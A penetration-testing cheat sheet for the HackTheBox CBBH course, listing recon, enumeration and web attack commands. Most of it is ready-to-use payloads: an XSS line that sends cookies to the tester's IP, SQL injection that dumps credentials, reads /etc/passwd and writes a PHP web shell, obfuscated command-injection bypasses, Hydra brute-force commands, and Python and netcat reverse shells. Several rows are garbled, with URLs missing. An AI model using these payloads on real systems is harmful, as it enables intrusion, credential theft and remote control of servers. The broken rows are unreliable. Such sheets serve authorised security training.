All cheetsheets with main information about CBBH role path in one place.
Information Gathering
Command | Description |
nslookup <target> | Identify A record for the target domain. |
export TARGET="domain.tld" | Assign target to an environment variable. |
whois $TARGET | WHOIS lookup for the target. |
DNS Enumeration
Command | Description |
nslookup $TARGET | Identify the A record for the target domain. |
nslookup -query=A $TARGET | Identify the A record for the target domain. |
dig <TARGET> @<nameserver/IP> | Identify the A record for the target domain. |
dig a $TARGET @<nameserver/IP> | Identify the A record for the target domain. |
nslookup -query=PTR <IP> | Identify the PTR record for the target IP address. |
dig -x <IP> @<nameserver/IP> | Identify the PTR record for the target IP address. |
nslookup -query=ANY $TARGET | Identify ANY records for the target domain. |
dig any $TARGET @<nameserver/IP> | Identify ANY records for the target domain. |
nslookup -query=TXT $TARGET | Identify the TXT records for the target domain. |
dig txt $TARGET @<nameserver/IP> | Identify the TXT records for the target domain. |
nslookup -query=MX $TARGET | Identify the MX records for the target domain. |
dig mx $TARGET @<nameserver/IP> | Identify the MX records for the target domain. |
Passive Subdomain Enumeration
Resource/Command | Description | |
VirusTotal | | |
Censys | | | | | |
`curl -s{domain} | jq -r '.[]' sort -u` | All subdomains for a given domain. |
curl -s{domain} jq -r '.[]' sort -u | All TLDs found for a given domain. | |
curl -s{domain} jq -r '.[]' sort -u | All results across all TLDs for a given domain. | |
curl -s{ip} jq -r '.[]' sort -u | Reverse DNS lookup on IP address. | |
curl -s{ip}/{mask} jq -r '.[]' sort -u | Reverse DNS lookup of a CIDR range. | |
curl -s "${TARGET}&output=json" jq -r '.[] "\(.name_value)\n\(.common_name)"' sort -u |
Certificate Transparency.
cat sources.txt \| while read source; do theHarvester -d "${TARGET}" -b $source -f "${source}-${TARGET}";done
Searching for subdomains and other information on the sources provided in the source.txt list.
Passive Infrastructure Identification
Resource/Command | Description |
Netcraft | |
WayBackMachine | |
WayBackURLs | |
waybackurls -dates https://$TARGET > waybackurls.txt | Crawling URLs from a domain with the date it was obtained. |
Active Infrastructure Identification
Resource/Command | Description |
curl -I "http://${TARGET}" | Display HTTP headers of the target webserver. |
whatweb -a -v | Technology identification. |
Wappalyzer | |
wafw00f -v https://$TARGET | WAF Fingerprinting. |
Aquatone | |
cat subdomain.list aquatone -out ./aquatone -screenshot-timeout 1000 | Makes screenshots of all subdomains in the |
subdomain.list. |
Active Subdomain Enumeration
Resource/Command | Description |
HackerTarget | |
SecLists | |
nslookup -type=any -query=AXFR $TARGET | Zone Transfer using Nslookup against the target domain and its nameserver. |
gobuster dns -q -r "${NS}" -d "${TARGET}" -w "${WORDLIST}" -p ./patterns.txt -o "gobuster_${TARGET}.txt" | Bruteforcing subdomains. |
Virtual Hosts
Resource/Command | Description | |
curl -s -H "Host:" | Changing the HOST HTTP header to request a specific domain. | |
`cat ./vhosts.list while read vhost;do echo "\n**\nFUZZING: ${vhost}\n**";curl -s -I http:// -H "HOST: ${vhost}.target.domain" | grep "Content-Length: ";done` | Bruteforcing for possible virtual hosts on the target domain. |
ffuf -w ./vhosts -u http://<IP address> -H "HOST:" -fs 612 | Bruteforcing for possible virtual hosts on the target domain using ffuf. |
Resource/Command | Description |
ZAP | |
ffuf -recursion -recursion-depth 1 -u -w /opt/useful/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt | Discovering files and folders that cannot be spotted by browsing the website. |
ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u | Mutated bruteforcing against the target web server. |
Javascript deobfuscation
Websites |
JS Console Prettier |
Beautifier |
JSNice |
Cross-site scripting (XSS)
Code | Description |
<script>alert(window.origin)</script> | Basic XSS Payload |
<plaintext> | Basic XSS Payload |
<script>print()</script> | Basic XSS Payload |
<img src="" onerror=alert(window.origin)> | HTML-based XSS Payload |
<script> = "#141d2b"</script> | Change Background Color |
<script>document.body.background = ""</script> | Change Background Image |
<script>document.title = 'HackTheBox Academy'</script> | Change Website Title |
<script>document.getElementsByTagName('body')\[0].innerHTML = 'text'</script> | Overwrite website's main body |
<script>document.getElementById('urlform').remove();</script> | Remove certain HTML element |
<script src="http://OUR_IP/script.js"></script> | Load remote script |
<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script> | Send Cookie details to us |
SQL injection
Command | Description |
mysql -u root -h -P 3306 -p | login to mysql database |
SHOW DATABASES | List available databases |
USE users | Switch to database |
CREATE TABLE logins (id INT, ...) | Add a new table |
SHOW TABLES | List available tables in current database |
DESCRIBE logins | Show table properties and columns |
INSERT INTO table_name VALUES (value_1,..) | Add values to table |
INSERT INTO table_name(column2, ...) VALUES (column2_value, ..) | Add values to specific columns in a table |
UPDATE table_name SET column1=newvalue1, ... WHERE <condition> | Update table values |
SELECT * FROM table_name | Show all columns in a table |
SELECT column1, column2 FROM table_name | Show specific columns in a table |
DROP TABLE logins | Delete a table |
ALTER TABLE logins ADD newColumn INT | Add new column |
ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn | Rename column |
ALTER TABLE logins MODIFY oldColumn DATE | Change column datatype |
ALTER TABLE logins DROP oldColumn | Delete column |
SELECT * FROM logins ORDER BY column_1 | Sort by column |
SELECT * FROM logins ORDER BY column_1 DESC | Sort by column in descending order |
SELECT * FROM logins ORDER BY column_1 DESC, id ASC | Sort by two-columns |
SELECT * FROM logins LIMIT 2 | Only show first two results |
SELECT * FROM logins LIMIT 1, 2 | Only show first two results starting from index 2 |
SELECT * FROM table_name WHERE <condition> | List results that meet a condition |
SELECT * FROM logins WHERE username LIKE 'admin%' | List results where the name is similar to a given string |
admin' or '1'='1 | Basic Auth Bypass |
admin')-- - | Basic Auth Bypass With comments |
' order by 1-- - | Detect number of columns using order by |
cn' UNION select 1,2,3-- - | Detect number of columns using Union injection |
cn' UNION select 1,@@version,3,4-- - | Basic Union injection |
UNION select username, 2, 3, 4 from passwords-- - | Union injection for 4 columns |
SELECT @@version | Fingerprint MySQL with query output |
SELECT SLEEP(5) | Fingerprint MySQL with no output |
cn' UNION select 1,database(),2,3-- - | Current database name |
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- - | List all databases |
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- - | List all tables in a specific database |
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- - | List all columns in a specific table |
cn' UNION select 1, username, password, 4 from dev.credentials-- - | Dump data from a table in another database |
cn' UNION SELECT 1, user(), 3, 4-- - | Find current user |
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- - | Find if user has admin privileges |
cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- - | Find if all user privileges |
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- - | Find which directories can be accessed through MySQL |
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- - | Read local file |
select 'file written successfully!' into outfile '/var/www/html/proof.txt' | Write a string to a local file |
cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- - | Write a web shell into the base web directory |
Commands injections
Injection operator | Injected character | URL - encoded character | Executed Command | ||
Semicolon | ; | %3b | Both | ||
New Line | \n | %0a | Both | ||
Background | & | %26 | Both (second output generally shown first) | ||
Pipe | %7c | Both (only second output is shown) | |||
AND | && | %26%26 | Both (only if first succeeds) | ||
OR | %7c%7c | Second (only if first fails) | |||
Sub-Shell | `` | %60%60 | Both (Linux-only) | ||
Sub-Shell | $() | %24%28%29 | Both (Linux-only) |
Command injection Bypass
Command | Description | |
printenv | Can be used to view all environment variables | |
%09 | Using tabs instead of spaces | |
${IFS} | Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $()) | |
{ls,-la} | Commas will be replaced with spaces | |
${PATH:0:1} | Will be replaced with / | |
${LS_COLORS:10:1} | Will be replaced with ; | |
$(tr '!-}' '"-~'<<<[) | Shift character by one ([ -> ) | |
' or " | Total must be even | |
$@ or \ | Linux only | |
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") | Execute command regardless of cases | |
$(a="WhOaMi";printf %s "${a,,}") | Another variation of the technique | |
`echo 'whoami' | rev` | Reverse a string |
$(rev<<<'imaohw') | Execute reversed command | |
echo -n 'cat /etc/passwd | grep 33' | base64 Encode a string with base64 |
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) | Execute b64 encoded string |
Command | Description |
%09 | Using tabs instead of spaces |
%PROGRAMFILES:~10,-5% | Will be replaced with a space - (CMD) |
$env:PROGRAMFILES\[10] | Will be replaced with a space - (PowerShell) |
%HOMEPATH:~0,-17% | Will be replaced with \ - (CMD) |
$env:HOMEPATH\[0] | Will be replaced with \ - (PowerShell) |
' or " | Total must be even |
^ | Windows only (CMD) |
WhoAmi | Simply send the character with odd cases |
"whoami"\[-1..-20] -join '' | Reverse a string |
iex "$('imaohw'\[-1..-20] -join '')" | Execute reversed command |
[Convert]::ToBase64String(\[System.Text.Encoding]::Unicode.GetBytes('whoami')) | Encode a string with base64 |
iex "$(\[System.Text.Encoding]::Unicode.GetString(\[System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))" | Execute b64 encoded string |
Login Brute forcing
Command | Description |
hydra -C wordlist.txt SERVER_IP -s PORT http-get / | Basic Auth Brute Force - Combined Wordlist |
hydra -L wordlist.txt -P wordlist.txt -u -f SERVER_IP -s PORT http-get / | Basic Auth Brute Force - User/Pass Wordlists |
hydra -l admin -P wordlist.txt -f SERVER_IP -s PORT http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'" | Login Form Brute Force - Static User, Pass Wordlist |
hydra -L bill.txt -P william.txt -u -f ssh://SERVER_IP:PORT -t 4 | SSH Brute Force - User/Pass Wordlists |
hydra -l m.gates -P rockyou-10.txt | FTP Brute Force - Static User, Pass Wordlist |
cupp -i | Creating Custom Password Wordlist |
sed -ri '/^.{,7}$/d' william.txt | Remove Passwords Shorter Than 8 |
sed -ri '/[!-/:-@\[-`\{-~]+/!d' william.txt | Remove Passwords With No Special Chars |
sed -ri '/[0-9]+/!d' william.txt | Remove Passwords With No Numbers |
./username-anarchy Bill Gates > bill.txt | Generate Usernames List |
Server side request forgery
Command | Description |
curl -i -s "http://<TARGET IP>/load?q=http://<VPN/TUN Adapter IP>:8080" | Testing for SSRF vulnerability |
python3 -m http.server 9090 | Starting the python web server |
sudo pip3 install twisted | Installing the ftp server |
sudo python3 -m twisted ftp -p 21 -r . | Starting the ftp server |
curl -i -s "http://<TARGET IP>/load?q=http://<VPN/TUN Adapter IP>:9090/index.html" | Retrieving a remote file through the target application (HTTP Schema) |
curl -i -s "http://<TARGET IP>/load?q=file:///etc/passwd" | Retrieving a local file through the target application (File Schema) |
for port in {1..65535};do echo $port >> ports.txt;done | Generating a wordlist of possible ports |
ffuf -w ./ports.txt:PORT -u "http://<TARGET IP>/load?q=" -fs 30 | Fuzzing for ports on the internal interface |
curl -i -s "http://<TARGET IP>/load?q=" | Interacting with the internal interface on the discovered port |
curl -i -s "http://<TARGET IP>/load?q=" | Interacting with the internal application |
curl -i -s "http://<TARGET IP>/load?q=" | Discovering web application listening in on localhost |
curl -i -s "http://<TARGET IP>/load?q=" | Modifying the URL to bypass the error message |
curl -i -s "http://<TARGET IP>/load?q=" -o - | Requesting to disclose the /proc/self/environ file on the internal application |
curl -i -s "http://<TARGET IP>/load?q=" | Retrieving a local file through the target application |
curl -i -s "http://<TARGET IP>/load?q=" | Confirming remote code exeuction on the remote host |
sudo apt-get install jq | Installing jq |
Blind SSRF Exploitation Example
Command | Description | |
nc -lvnp 9090 | Starting a netcat listener | |
`echo "\" | base64 -d` | Decoding the base64 encoded response |
export RHOST="<VPN/TUN IP>";export RPORT="<PORT>";python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));\[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' | Reverse shell payload (to be URL encoded twice) |
SSI Injection Exploitation Example
SSI Directive Payload Description
Command | Description |
<!--#echo var="DATE_LOCAL" --> | Date |
<!--#printenv --> | All variables |
<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo /bin/bash 1>/tmp/foo;rm /tmp/foo" --> | Reverse Shell |
SSTI Exploitation Example 1
Command | Description |
curl -X POST -d 'email=${7*7}' http://<TARGET IP>:<PORT>/jointheteam | Interacting with the remote target (Spring payload) |
curl -X POST -d 'email={{_self.env.display("TEST"}}' http://<TARGET IP>:<PORT>/jointheteam | Interacting with the remote target (Twig payload) |
curl -X POST -d 'email={{config.items()}}' http://<TARGET IP>:<PORT>/jointheteam | Interacting with the remote target (Jinja2 basic injection) |
curl -X POST -d 'email={{ [].class.base.subclasses() }}' http://<TARGET IP>:<PORT>/jointheteam | Interacting with the remote target (Jinja2 dump all classes payload) |
curl -X POST -d "email={% import os %}{{os.system('whoami')}}" http://<TARGET IP>:<PORT>/jointheteam | Interacting with the remote target (Tornado payload) |
curl -gs "http://<TARGET IP>:<PORT>/execute?cmd={{7*'7'}}" | Interacting with the remote target (Confirming Jinja2 backend) |
./ -u 'http://<TARGET IP>:<PORT>/execute?cmd' | Automating the templating engine identification process with tplmap |